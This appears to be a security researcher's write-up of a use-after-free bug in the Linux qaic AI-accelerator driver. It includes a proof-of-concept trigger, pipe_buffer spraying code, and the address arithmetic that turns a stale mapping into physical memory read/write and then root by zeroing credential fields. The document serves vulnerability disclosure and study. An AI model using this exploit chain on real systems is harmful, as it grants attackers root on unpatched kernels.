Privilege Escalation via a Page Use-After-Free in Qualcomm's AI Accelerator Linux Kernel Driver
Turning a stale QAIC page-table mapping into a pipe_buffer-backed physical read/write primitive.
This post is a shorter one because the resulting exploit primitive is very strong.
The vulnerability leaves behind a dangling page-table entry and therefore creates a page-level use-after-free scenario.
By reclaiming the freed physical page as a pipe_buffer slab page, that is, a page holding the kernel's pipe I/O buffer metadata, I can control the pipe_buffer objects stored there.
That gives me a physical arbitrary read/write primitive, which I use for privilege escalation on a Linux v6.18 kernel.
The bug lives in Qualcomm's Cloud AI Accelerator kernel driver, qaic, which is present in mainline Linux. I do not own the hardware because these accelerators are expensive, so I virtualize the driver for exploit development. That is sufficient here because the attack does not require hardware-specific internals: I only need to map and unmap the driver's user-visible buffer object to trigger the bug. In practice, the virtualization layer only stubs out hardware-dependent initialization and teardown, which makes the vulnerability much easier to study in a controlled setup.
qaic page-level use after free.
Hardware Virtualization
Before going into the exploitation details, I want to describe the virtualization setup that made the experiments possible without having access to the actual accelerator hardware.
The relevant observation is that the bug does not require executing workloads on the device.
It only requires the driver paths that allocate a buffer object, expose an mmap offset, map the backing pages into user space, unmap the Virtual Memory Area (VMA), and later free the buffer object.
Those paths are mostly kernel-side and memory-management logic, not hardware execution logic.
For the experiments, I patched qaic with a fake_online module parameter (see qaic-fake-online.patch).
When this parameter is set, the driver skips PCI probing and instead registers a synthetic parent device with root_device_register("qaic_fake").
It then creates a fake qaic_device, marks it as QAIC_ONLINE, gives it one synthetic Direct Buffer Channel (DBC), initializes the mutexes, Sleepable Read-Copy Update (SRCU) state, workqueues, waitqueues, and buffer-object lists that the normal driver paths expect, and finally registers the accel device through the existing qaic_create_drm_device path.
This is enough to get a user-visible qaic device node and to exercise the buffer-object lifecycle needed for the vulnerability.
The fake mode also avoids hardware-dependent cleanup in paths such as qaic_postclose, where the real driver would normally release users and DBC state through device-specific control paths.
In other words, the patch does not emulate the accelerator.
It only makes the driver look online enough for the allocation, mapping, unmapping, and freeing operations that matter for this bug.
With that setup, I could continue the experiments in a normal kernel test environment despite not owning the Qualcomm hardware.
That is also why this vulnerability was practical to analyze: the exploit primitive is produced by a mismatch between the driver's mapping code and the kernel's page-table teardown behavior, so the core experiment remains valid as long as the relevant qaic buffer-object and mmap paths are reachable.
The Bug
Linux represents user-space mappings through vm_area_struct objects, where each VMA describes one contiguous virtual-address range together with its permissions and mapping behavior.
For ordinary memory, this is mostly generic memory-management bookkeeping.
Device mappings are more interesting because the VMA becomes the handoff point between generic memory-management code, page-table installation, and driver-managed backing pages.
That means the kernel side and the driver side have to align on the exact mapped range and on the lifetime of the underlying physical memory.
If those assumptions diverge, stale page-table reachability to freed physical pages can follow.
In qaic, that boundary is exposed through the driver's custom mmap path, qaic_gem_object_mmap, which walks the buffer object's scatterlist and maps each entry into the user VMA.
The important observation is that this loop never verifies that the accumulated mapping range actually stays within vma->vm_start and vma->vm_end.
static int qaic_gem_object_mmap(struct drm_gem_object *obj, struct vm_area_struct *vma)
{
	struct qaic_bo *bo = to_qaic_bo(obj);
	unsigned long offset = 0;
	struct scatterlist *sg;
	int ret = 0;
	if (drm_gem_is_imported(obj))
		return -EINVAL;
	for (sg = bo->sgt->sgl; sg; sg = sg_next(sg)) {
		if (sg_page(sg)) {
			ret = remap_pfn_range(vma, vma->vm_start + offset, page_to_pfn(sg_page(sg)),
					      sg->length, vma->vm_page_prot);
			if (ret)
				goto out;
			offset += sg->length;
		}
	}
out:
	return ret;
}
qaic_gem_object_mmap maps the scatterlist entries into the user VMA without checking the full resulting range.
Listing 1 maps the pages referenced by the buffer object's scatterlist into user space.
The scatter-gather metadata is stored in an sg_table at bo->sgt, and bo->sgt->sgl is the head of the linked scatterlist entries that describe the allocated pages.
These entries may refer either to individual order-0 pages or to higher-order compound pages.
At that point, the obvious follow-up question is whether remap_pfn_range enforces that boundary for the driver.
The short answer is effectively no.
The function remap_pfn_range_internal, which remap_pfn_range_notrack calls internally, computes end = addr + PAGE_ALIGN(size) from the requested size.
However, outside a special copy-on-write case, it does not check that this resulting end still lies within vma->vm_end.
In other words, for the common device-mapping case used here, the kernel largely trusts the driver to pass a sane range.
Crucially, qaic does not pass a sane range here: the loop in Listing 1 maps the full scatterlist regardless of the VMA length.
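To make the missing check concrete, the following is a minimal user-space model of the scatterlist walk with a range check added. It is a sketch under stated assumptions, not the driver code and not necessarily how the issue is fixed upstream: struct vma_model, sg_lens, and map_sg_checked are hypothetical names, and the real loop would call remap_pfn_range at the marked position.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the two VMA fields that matter here. */
struct vma_model {
	uint64_t vm_start;
	uint64_t vm_end;
};

/*
 * Model of the scatterlist walk with an added range check.
 * Returns 0 and stores the mapped byte count in *mapped, or -EINVAL
 * as soon as the next entry would extend past vm_end.
 */
static int map_sg_checked(const struct vma_model *vma,
			  const uint64_t *sg_lens, size_t nents,
			  uint64_t *mapped)
{
	uint64_t room, offset = 0;

	assert(vma->vm_end >= vma->vm_start);
	room = vma->vm_end - vma->vm_start;
	for (size_t i = 0; i < nents; i++) {
		/* Reject instead of installing PTEs beyond the VMA. */
		if (sg_lens[i] > room - offset)
			return -EINVAL;
		/* The real loop would call remap_pfn_range() here. */
		offset += sg_lens[i];
	}
	*mapped = offset;
	return 0;
}
```

With a VMA of 1024 pages and scatterlist entries of 1024 and 8 pages, the model accepts the first entry and rejects the second, which is exactly the entry that the unchecked loop maps past vm_end.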
Next, let's look at how qaic allocates the pages that later appear in the scatterlist.
static int create_sgt(struct qaic_device *qdev, struct sg_table **sgt_out, u64 size)
{
	struct scatterlist *sg;
	struct sg_table *sgt;
	struct page **pages;
	int *pages_order;
	int max_order;
	int nr_pages;
	int ret = 0;
	int i, j, k;
	int order;
	[...]
	nr_pages = DIV_ROUND_UP(size, PAGE_SIZE);
	[...]
	/*
	 * Allocate requested memory using alloc_pages. It is possible to allocate
	 * the requested memory in multiple chunks by calling alloc_pages
	 * multiple times. Use SG table to handle multiple allocated pages.
	 */
	i = 0;
	while (nr_pages > 0) {
		order = min(get_order(nr_pages * PAGE_SIZE), max_order);
		while (1) {
			pages[i] = alloc_pages(GFP_KERNEL | GFP_HIGHUSER |
					       __GFP_NOWARN | __GFP_ZERO |
					       (order ? __GFP_NORETRY : __GFP_RETRY_MAYFAIL),
					       order);
			if (pages[i])
				break;
			if (!order--) {
				ret = -ENOMEM;
				goto free_partial_alloc;
			}
		}
		max_order = order;
		pages_order[i] = order;
		nr_pages -= 1 << order;
		[...]
		i++;
	}
	[...]
	/* Populate the SG table with the allocated memory pages */
	sg = sgt->sgl;
	for (k = 0; k < i; k++, sg = sg_next(sg)) {
		[...]
		sg_set_page(sg, pages[k], PAGE_SIZE << pages_order[k], 0);
		[...]
	}
	[...]
}
create_sgt can build scatterlist entries that reference higher-order compound pages.
As shown in Listing 2, create_sgt fills the pages array with allocations of different orders until they cover the requested size, rounded up to whole pages.
It may allocate order-0 pages or higher-order compound pages and then insert them into the scatterlist as single entries whose sg->length spans multiple base pages.
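The chunking can be reproduced with a small user-space model of the allocation loop. This is a sketch, assuming 4 KiB pages, an initial max_order cap of 10 (the elided part of Listing 2 sets the real value), and that every alloc_pages call succeeds at the first order tried. The names order_for_pages and split_into_orders are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_PAGE_SHIFT 12   /* assumption: 4 KiB pages */
#define MODEL_MAX_ORDER  10   /* assumption: initial cap on the chunk order */

/* Smallest order whose page count covers nr_pages (mirrors get_order). */
static int order_for_pages(uint64_t nr_pages)
{
	int order = 0;

	while ((1ULL << order) < nr_pages)
		order++;
	return order;
}

/*
 * Split a byte size into chunk orders the way the loop in Listing 2 does
 * when no allocation has to fall back to a smaller order.
 * Returns the number of chunks written to orders[].
 */
static size_t split_into_orders(uint64_t size, int *orders, size_t cap)
{
	uint64_t page_size = 1ULL << MODEL_PAGE_SHIFT;
	int64_t nr_pages = (int64_t)((size + page_size - 1) / page_size);
	int max_order = MODEL_MAX_ORDER;
	size_t n = 0;

	assert(orders != NULL);
	while (nr_pages > 0 && n < cap) {
		int order = order_for_pages((uint64_t)nr_pages);

		if (order > max_order)
			order = max_order;
		max_order = order;
		orders[n++] = order;
		nr_pages -= 1LL << order;
	}
	return n;
}
```

Under these assumptions, a request of (PAGE_SIZE << 10) + (PAGE_SIZE << 3) bytes splits into one order-10 chunk followed by one order-3 chunk, so the scatterlist has two entries of very different lengths.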
Putting Listings 1 and 2 together with the missing boundary checks in remap_pfn_range gives the actual exploitable bug.
#define TARGET_BO_MAPPING (PAGE_SIZE << 10)
#define TARGET_BO_SIZE (TARGET_BO_MAPPING + (PAGE_SIZE << 3))
#define DANGLING_ADDR 0xdeadbeef000
int poc(void)
{
	int fd = open_qaic("/dev/accel/accel0");
	uint32_t handle = qaic_create_bo(fd, TARGET_BO_SIZE); // [1]
	uint64_t mmap_offset = qaic_get_mmap_offset(fd, handle);
	void *mapping = qaic_map_bo_addr(DANGLING_ADDR, fd,
					 TARGET_BO_MAPPING, mmap_offset); // [2]
	/*
	 * This intentionally writes beyond the nominal VMA length to demonstrate
	 * that QAIC mapped more than userspace asked for.
	 */
	memset(mapping, 0x41, TARGET_BO_SIZE);
	/*
	 * Keep an adjacent mapping present to stabilize page-table teardown and
	 * avoid losing a higher-level page table page during unmap.
	 */
	SYSCHK(mmap((void *)(DANGLING_ADDR + TARGET_BO_MAPPING + PAGE_SIZE),
		    PAGE_SIZE, PROT_READ | PROT_WRITE,
		    MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0)); // [5]
	SYSCHK(munmap(mapping, TARGET_BO_MAPPING)); // [3]
	qaic_free_bo(fd, handle); // [4]
	return 0;
}
Listing 3 shows the essential proof-of-concept sequence to trigger the vulnerability.
At [1], the PoC allocates a qaic buffer object of size TARGET_BO_SIZE.
At [2], it maps only TARGET_BO_MAPPING bytes into user space, which is intentionally smaller than the backing buffer object.
Because qaic_gem_object_mmap does not bound the scatterlist mapping against the VMA, the driver can install page-table entries for backing pages beyond the requested mapping length.
At [3], munmap() removes only the requested VMA range.
At [4], qaic_free_bo() eventually reaches the driver's buffer-object teardown and frees the full scatterlist backing.
At that point, the mappings installed beyond the requested VMA range can outlive the buffer object they originally pointed to.
The result is inconsistent page-table state: user space still has translations to physical pages that the driver has already returned to the allocator.
At [5], which runs before the munmap() at [3], the PoC places a small anonymous mapping just past the target range.
This keeps the relevant upper-level page-table structures allocated during teardown, so the interesting leftover page-table entries (PTEs) are not lost as a side effect of freeing an otherwise empty page-table page.
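The address range that stays reachable after [3] and [4] follows directly from the constants in Listing 3. The sketch below only does that arithmetic; it assumes 4 KiB pages, and struct stale_window and stale_window_for are hypothetical names used for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_PAGE_SIZE   4096ULL   /* assumption: 4 KiB pages */
#define TARGET_BO_MAPPING (MODEL_PAGE_SIZE << 10)
#define TARGET_BO_SIZE    (TARGET_BO_MAPPING + (MODEL_PAGE_SIZE << 3))
#define DANGLING_ADDR     0xdeadbeef000ULL

struct stale_window {
	uint64_t start;   /* first address still translated after munmap() */
	uint64_t end;     /* one past the last stale address */
	uint64_t pages;   /* number of stale base pages */
};

/* Compute the range the driver mapped but the VMA does not cover. */
static struct stale_window stale_window_for(uint64_t addr, uint64_t vma_len,
					    uint64_t bo_len)
{
	struct stale_window w;

	assert(bo_len >= vma_len);
	w.start = addr + vma_len;
	w.end = addr + bo_len;
	w.pages = (w.end - w.start) / MODEL_PAGE_SIZE;
	return w;
}
```

For the PoC values, stale_window_for(DANGLING_ADDR, TARGET_BO_MAPPING, TARGET_BO_SIZE) yields a window of eight pages that starts immediately after the unmapped VMA, which is the order-3 range used later in the exploit.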
Exploit Path
After the trigger, the stale mapping still points to physical pages that originally backed the qaic buffer object.
The driver has already returned those pages to the allocator, so the next step is to reclaim the same physical memory with an object whose metadata is useful to control.
Before continuing, let's recap the allocator details that matter here.
Typical Linux kernel heap allocations move through several layers that are relevant for exploitation: slab caches manage typed or size-classed objects, the per-CPU page lists (PCP) provide a fast path for recently freed pages of a given order, and the buddy allocator is the lower-level fallback.
A slab cache obtains one or more backing pages and splits that memory into object slots.
These backing pages are commonly called slab pages.
When the active slab state for a cache no longer has a suitable free slot, the allocator needs another slab page and can obtain one from PCP before falling back to buddy.
This is the scenario I want to create here: the freed qaic backing page should remain in PCP, and the next same-order slab allocation should reuse it as a slab page for the target cache.
For this exploit, I use pipe_buffer objects because they contain exactly the fields needed to redirect pipe I/O to attacker-chosen physical pages: a page pointer, an offset, and a length.
The exploit prepares many pipes before triggering the bug, then grows and fills them after freeing the qaic buffer object.
This causes the allocator to reuse the freed physical page range as a slab page containing pipe_buffer metadata.
The exploit deliberately uses an order-3 page range and reclaims it as an order-3 pipe_buffer slab page, keeping the reuse path same-order from PCP.
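The two-phase pipe handling can be sketched from user space as follows. This is an illustration rather than the exploit's actual spray: SPRAY_PIPES and RING_BYTES are hypothetical values, and the capacity needed to land in a particular slab cache and page order depends on the target kernel. Only pipe, fcntl with F_SETPIPE_SZ, and write are used.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031   /* Linux value, used if the libc headers hide it */
#endif

#define SPRAY_PIPES 8             /* hypothetical; a real spray uses far more */
#define RING_BYTES  (64 * 4096)   /* hypothetical capacity per pipe */

/* Phase 1: create the pipes up front so later steps only resize them. */
static int spray_prepare(int fds[SPRAY_PIPES][2])
{
	assert(fds != NULL);
	for (int i = 0; i < SPRAY_PIPES; i++)
		if (pipe(fds[i]) < 0)
			return -1;
	return 0;
}

/*
 * Phase 2: grow each pipe, which makes the kernel allocate a new
 * pipe_buffer array, then write one byte so a slot becomes populated.
 * Returns the number of pipes that were grown and filled.
 */
static int spray_grow_and_fill(int fds[SPRAY_PIPES][2])
{
	int done = 0;

	for (int i = 0; i < SPRAY_PIPES; i++) {
		if (fcntl(fds[i][1], F_SETPIPE_SZ, RING_BYTES) < 0)
			continue;
		if (write(fds[i][1], "A", 1) == 1)
			done++;
	}
	return done;
}
```

Splitting preparation from growth keeps the allocations that happen after the free limited to the pipe_buffer arrays themselves, which is the point of preparing the pipes before triggering the bug.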
Since the stale user mapping still covers that physical memory, the exploit can read from and write to the reclaimed page directly.
It can then verify that the page contains plausible pipe_buffer objects, for example by checking stable-looking ops and flags fields.
Once the reclaimed page contains live pipe_buffer objects, the stale mapping becomes a way to control pipe metadata from user space.
The exploit first derives the vmemmap base from an existing pipe_buffer->page pointer.
With that base, it can translate a physical address into the corresponding struct page address.
Rewriting a controlled pipe_buffer to point at that page, with a chosen offset and length, turns normal pipe reads and writes into arbitrary physical memory reads and writes.
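The address arithmetic behind this step is short enough to sketch. The block below assumes 4 KiB pages, a 64-byte struct page, and a vmemmap base that is 1 GiB aligned, so that rounding a leaked page pointer down recovers it. These are assumptions to verify on the target build. struct pipe_buffer_model mirrors the pipe_buffer fields with pointers stored as integers, and all function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_PAGE_SHIFT 12            /* assumption: 4 KiB pages */
#define STRUCT_PAGE_SIZE 64ULL         /* assumption: sizeof(struct page) */
#define VMEMMAP_ALIGN    (1ULL << 30)  /* assumption: 1 GiB aligned base */

/* User-space mirror of the pipe_buffer fields. */
struct pipe_buffer_model {
	uint64_t page;          /* struct page * */
	uint32_t offset;
	uint32_t len;
	uint64_t ops;           /* const struct pipe_buf_operations * */
	uint32_t flags;
	uint64_t private_data;  /* unsigned long private */
};

/* Recover the vmemmap base by rounding a leaked page pointer down. */
static uint64_t vmemmap_base_from_page(uint64_t page_ptr)
{
	return page_ptr & ~(VMEMMAP_ALIGN - 1);
}

/* Translate a physical address into the address of its struct page. */
static uint64_t phys_to_page(uint64_t vmemmap_base, uint64_t phys)
{
	return vmemmap_base + (phys >> MODEL_PAGE_SHIFT) * STRUCT_PAGE_SIZE;
}

/* Point a controlled pipe_buffer at [phys, phys + len) within one page. */
static void aim_pipe_buffer(struct pipe_buffer_model *buf,
			    uint64_t vmemmap_base, uint64_t phys, uint32_t len)
{
	uint32_t offset = (uint32_t)(phys & ((1ULL << MODEL_PAGE_SHIFT) - 1));

	assert((uint64_t)offset + len <= (1ULL << MODEL_PAGE_SHIFT));
	buf->page = phys_to_page(vmemmap_base, phys);
	buf->offset = offset;
	buf->len = len;
}
```

Under these assumptions the masking trick only works while the leaked page pointer lies within the first 1 GiB of vmemmap, which corresponds to the first 64 GiB of physical memory. Each access is limited to a single page, so larger transfers need one rewrite per page.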
The privilege-escalation part then uses this physical read/write primitive directly.
First, it sanity-checks the primitive by reading physical address zero and validating the expected BIOS marker.
It then derives the randomized kernel virtual base from the leaked pipe_buffer->ops pointer, which points into anon_pipe_buf_ops.
From there, the exploit scans 2 MiB-aligned physical kernel-image candidates until it finds init_task by checking for the expected swapper/ task name.
After locating the physical kernel image, the exploit reads page_offset_base and uses it to translate direct-map virtual addresses back to physical addresses.
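The translations used in these steps are plain offset arithmetic. The following sketch shows them in isolation. The image offset of anon_pipe_buf_ops is build-specific and passed in as a parameter rather than hard-coded, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Kernel virtual base = leaked ops pointer minus the symbol's image offset. */
static uint64_t kernel_vbase_from_ops(uint64_t leaked_ops,
				      uint64_t ops_image_offset)
{
	assert(leaked_ops >= ops_image_offset);
	return leaked_ops - ops_image_offset;
}

/* Physical address of an image symbol, given both image bases. */
static uint64_t image_sym_to_phys(uint64_t sym_vaddr, uint64_t kernel_vbase,
				  uint64_t kernel_pbase)
{
	assert(sym_vaddr >= kernel_vbase);
	return sym_vaddr - kernel_vbase + kernel_pbase;
}

/* Direct-map virtual address to physical address. */
static uint64_t directmap_to_phys(uint64_t vaddr, uint64_t page_offset_base)
{
	assert(vaddr >= page_offset_base);
	return vaddr - page_offset_base;
}
```

The first two helpers cover symbols inside the kernel image, such as init_task and page_offset_base. The third covers heap objects such as task_struct and cred, which are reached through the direct map.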
It then walks the global task list starting from init_task, converts each task-list pointer through the direct map, and searches for the current process by its marker comm value.
Once it finds the current task_struct, it reads the credential pointer, translates the backing cred object to a physical address, verifies the expected UID/GID values, and zeroes the credential ID fields.
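The verify-then-zero step can be modeled on a local copy of the cred bytes. The sketch assumes a layout of an 8-byte usage counter followed by eight 32-bit IDs (uid, gid, suid, sgid, euid, egid, fsuid, fsgid), and it assumes that all UID slots and all GID slots of the calling process hold the same value. Both are assumptions to check against the target build, and cred_zero_ids is a hypothetical name.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define CRED_IDS_OFFSET 8   /* assumption: IDs follow an 8-byte usage counter */
#define CRED_ID_COUNT   8   /* uid, gid, suid, sgid, euid, egid, fsuid, fsgid */

/*
 * Check that a cred image read through the primitive matches the caller's
 * IDs, then zero all ID fields in the local copy.
 * Returns 0 on success, -1 if the image does not look like our cred.
 */
static int cred_zero_ids(uint8_t *cred_image, size_t image_len,
			 uint32_t uid, uint32_t gid)
{
	uint32_t ids[CRED_ID_COUNT];

	assert(cred_image != NULL);
	if (image_len < CRED_IDS_OFFSET + sizeof(ids))
		return -1;
	memcpy(ids, cred_image + CRED_IDS_OFFSET, sizeof(ids));
	/* Even slots hold UIDs, odd slots hold GIDs. */
	for (int i = 0; i < CRED_ID_COUNT; i++)
		if (ids[i] != ((i % 2) ? gid : uid))
			return -1;
	memset(cred_image + CRED_IDS_OFFSET, 0, sizeof(ids));
	return 0;
}
```

In the exploit flow, the modified image would then be written back to the cred object's physical address through the pipe-based write primitive. Checking the IDs first guards against patching memory that is not actually the current process's cred.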
At that point the process has root credentials and can spawn a root shell.
I ran these experiments in QEMU with the fake-online qaic setup described above.
The working exploit was developed and tested on Linux v6.18 built with Fedora's kernel configuration.
This setup was useful because it kept the tested kernel close to a distribution-style configuration while still letting me iterate quickly in a controlled virtual environment.
Conclusion
This bug is a good example of why driver mmap paths deserve careful boundary and lifetime checks.
The vulnerable code does not corrupt a kernel object directly.
Instead, it lets a driver install page-table entries outside the range that the VMA teardown later accounts for.
Once the backing buffer object is freed, those leftover translations become a page-level use after free.
The hardware-virtualization setup also made a practical difference.
Because the vulnerability sits in the buffer-object and mapping lifecycle, not in accelerator execution, a fake-online qaic instance was enough to keep experimenting without the physical device.
That made it possible to develop the trigger and then turn the stale physical mapping into a pipe_buffer-based physical read/write primitive.
In the end, the exploitation path is fairly direct: create a stale mapping, reclaim the freed page with useful kernel metadata, use that metadata to obtain physical memory access, and modify the current process credentials. I open-sourced the full research setup, including the exploit, virtualization patch, and build scripts, at qaic-page-uaf.
If you find this work interesting, have questions, or notice technical inaccuracies, feel free to contact me at lukas.maar@tugraz.at.